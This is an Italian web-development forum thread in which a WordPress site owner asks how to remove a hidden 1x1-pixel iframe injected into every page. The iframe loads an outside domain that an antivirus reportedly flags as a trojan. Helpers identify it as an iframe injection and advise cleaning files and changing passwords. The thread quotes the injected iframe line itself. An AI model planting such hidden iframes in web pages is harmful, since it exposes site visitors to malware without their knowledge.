Visualizzazione dei risultati da 1 a 6 su 6

Discussione: Togliere Una Riga Htlm

Togliere Una Riga Htlm

Ciao a tutti!
    Non so se questa sezione è adatta per la richiesta che vorrei farvi..
    Ho questo problema.. sul mio sito, qualunque pagina apra con Chrome, l'icona mi da un caricamento continuo per un buon 3 minuti!
    Ho scoperto casualmente che questo caricamento è dovuto ad un link che dev'esser corrotto, e comunque il link ridotto ai minimi termini, invia ad un sito di CONTATTI HARD!!!
    Ora.. dalla home page principale come qualunque altra pagina aperta con CHROME, in altro a sinista c'è un quadratino di 1 pixel x 1, che ispezionandolo con il visualizzatore di Chrome mi manda a questa riga...
    <iframe src="http://mocoreward.com/frame/aan.html" width="1" height="1">
    </iframe>
    Ora... dove caspita la trovo sta riga!!! in che file??? cosi la cancello!!!
    Infatti cancellandola con il programma incluso in Chrome il problema sparisce!!!
    Io uso un tema su piattaforma WP!
    QUI VISITATE IL SITO
    Mi riuscite a dare qualche indicazione??? Se non ci riuscite voi in questo sito che è il re della programmazione ... non saprei a chi altri rivolgermi!
    Grazie!!!

Allego screenshot
    AllenatoreMentale

Lo screen non riesco ad allegarlo mi dice che è troppo grande... bho!
    AllenatoreMentale

nulla a che fare con i css
    se no l'hai messo tu lo avrà fatto qualche javascript
    cancellali tutti e rimettili uno alla volta controllando che non ti rifaccia lo scherzo
    a me che navigo con i js disattivatti, è andato velocissimo,
    ma al footer ti manca qualcosa
    codice:
    Warning: preg_match() [function.preg-match]: Compilation failed: nothing to repeat at offset 1 in /home/vodoooco/domains/vodooo.com/public_html/wp-content/plugins/wassup/wassup.php on line 3954

Warning: preg_match() [function.preg-match]: Compilation failed: nothing to repeat at offset 1 in /home/vodoooco/domains/vodooo.com/public_html/wp-content/plugins/wassup/wassup.php on line 3954

Utente di HTML.it L'avatar di Prill
    Ciao steferru, non ho aperto il tuo link, ma il problema me ne ricorda uno analogo che un annetto e mezzo fa fa circa colpì molti siti, anche di amici. Se cerchi iframe injection su google dovresti trovare più notizie su questo accesso ai file del sito e l'inserimento di un codice che richiama un iframe. Dovresti ricaricare sul tuo spazio tutte le pagine emendate dal codice in questione e provvedere a modificare le password di accesso come prima cosa. Altri potranno poi dirti meglio

Utente di HTML.it L'avatar di Prill
    Sarebbe meglio rimuovere subito il link per evitare che si scarichi qualche porcheria, provando ad aprirlo avast segnala un cavallo di troia bloccato. L'iframe se non è richiamato attraverso il codice html potrebbe esserlo attraverso uno script

Frontend samurai L'avatar di fcaldera
    Originariamente inviato da Prill
    Sarebbe meglio rimuovere subito il link per evitare che si scarichi qualche porcheria, provando ad aprirlo avast segnala un cavallo di troia bloccato. L'iframe se non è richiamato attraverso il codice html potrebbe esserlo attraverso uno script
    edito il link
    Vuoi aiutare la riforestazione responsabile?

Iscriviti a Ecologi e inizia a rimuovere la tua impronta ecologica (30 alberi extra usando il referral)

Permessi di invio